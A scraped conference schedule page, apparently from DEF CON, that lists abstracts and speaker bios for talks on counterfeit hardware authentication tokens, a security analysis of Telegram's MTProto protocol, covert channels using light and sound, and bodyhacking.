Secure Tokin' and Doobiekeys: How to roll your own counterfeit hardware security devices

Saturday at 11:00 in Track 2

45 minutes | Demo, Tool

Joe FitzPatrick SecuringHardware.com

Michael Leibowitz Senior Trouble Maker

Let's face it, software security is still in pretty bad shape. We could tell ourselves that everything is fine, but in our hearts, we know the world is on fire. Even as hackers, it's incredibly hard to know whether your computer, phone, or secure messaging app is pwned. Of course, there's a Solution(tm) - hardware security devices.

We carry authentication tokens not only to secure our banking and corporate VPN connections, but also to access everything from cloud services to social networking. While we've isolated these 'trusted' hardware components from our potentially pwnd systems so that they might be more reliable, we will present scenarios against two popular hardware tokens where their trust can be easily undermined. After building our modified and counterfeit devices, we can use them to circumvent intended security assumptions made by their designers and users. In addition to covering technical details about our modifications and counterfeit designs, we'll explore a few attack scenarios for each.

Sharing is Caring, so after showing off a few demonstrations, we'll walk you through the process of rolling your own Secure Tokin' and Doobiekey that you can pass around the circle at your next cryptoparty.

Joe FitzPatrick
Joe is an Instructor and Researcher at https://SecuringHardware.com. Joe has spent over a decade working on low-level silicon debug, security validation, and penetration testing of CPUs, SoCs, and microcontrollers. He has spent the past 5 years developing and leading hardware security related training, instructing hundreds of security researchers, pen testers and hardware validators worldwide. When not teaching Applied Physical Attacks training, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.

@securelyfitz

Michael Leibowitz
Michael has done hard-time in real-time. An old-school computer engineer by education, he spends his days hacking the mothership for a large semiconductor company. Previously, he developed and tested embedded hardware and software, dicked around with strap-on boot roms, mobile apps, office suites, and written some secure software. On nights and weekends he hacks on electronics, writes DEF CON CFPs, and contributes to the NSA Playset.

@r00tkillah


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 16:00-16:30


Title:
Security Analysis of the Telegram IM

Author:
Tomas Susanka (CTU Prague)

Abstract:
Telegram is a popular instant messaging service, a self-described fast and secure solution. It introduces its own home-made cryptographic protocol MTProto instead of using already known solutions, which was criticised by a significant part of the cryptographic community.

In this talk we will briefly introduce the protocol to provide context and then present two major findings we discovered as part of our security analysis performed in late 2016: first, the undocumented obfuscation method Telegram uses, and second, a replay attack vulnerability we discovered. The analysis was mainly focused on the MTProto protocol and Telegram's official client for Android.

Bio:
Tomas Susanka studied and lives in Prague, and occasionally at other universities and in other cities because, according to him, why not. He wrote his Master's thesis on Telegram IM and amongst other things discovered an undocumented obfuscation and a possible vulnerability, which he then reported to the powers that be.

Earlier this year he graduated from FIT CTU and currently would like to move into the world of infosec. He's joining Cloudflare's crypto team for a summer internship in 2017. When he wasn't roaming the world and studying abroad he worked on a number of web applications, APIs and a Q&A mobile game. He likes to eat grapefruits before going to bed and playing chess, as unlikely a combination as it sounds.

Return to Index      -     

 

DEFCON - Track 2 - Thursday - 14:00-14:45


See no evil, hear no evil: Hacking invisibly and silently with light and sound

Thursday at 14:00 in 101 Track 2

45 minutes | Demo, Tool

Matt Wixey Senior Associate, PwC

Traditional techniques for C2 channels, exfiltration, surveillance, and exploitation are often frustrated by the growing sophistication and prevalence of security protections, monitoring solutions, and controls. Whilst all is definitely not lost, from an attacker's perspective - we constantly see examples of attackers creatively bypassing such protections - it is always beneficial to have more weapons in one's arsenal, particularly when coming up against heavily-defended networks and highly-secured environments.

This talk demonstrates a number of techniques and attacks which leverage light and/or sound, using off-the-shelf hardware. It covers everything from C2 channels and exfiltration using light and near-ultrasonic sound, to disabling and disrupting motion detectors; from laser microphones, to repelling drones; from trolling friends, to jamming speech and demotivating malware analysts.

This talk not only provides attendees with a new suite of techniques and methodologies to consider when coming up against a well-defended target, but also demonstrates, in a hopefully fun and practical way, how these techniques work, their advantages, disadvantages, and possible future developments. It also gives details of real case studies where some of these techniques have been used, and provides defenders with realistic methods for the mitigation of these attacks.

Finally, the talk covers some ideas for future research in this area.

Matt Wixey
Matt Wixey is a penetration tester on PwC's Threat and Vulnerability Management team in the UK, and leads the team's research function. Prior to joining PwC, he led a technical R&D team in a UK law enforcement agency. His research interests include bypassing air-gaps, antivirus and sandbox technologies, and RF hacking.

@darkartlab


Return to Index      -     

 

BHV - Pisa Room - Friday - 14:00-14:29


Title: Sensory Augmentation 101

Speaker: Trevor Goodman

About Trevor Goodman:
Trevor Goodman is a bodyhacker and the Event Director for BDYHAX, the BodyHacking Convention. They are working to grow the bodyhacking and biohacking industries and communities in the US, Canada and Europe. Trevor is also the Event Director for InfoSec Southwest in Austin, TX and Director of Rogue Signal.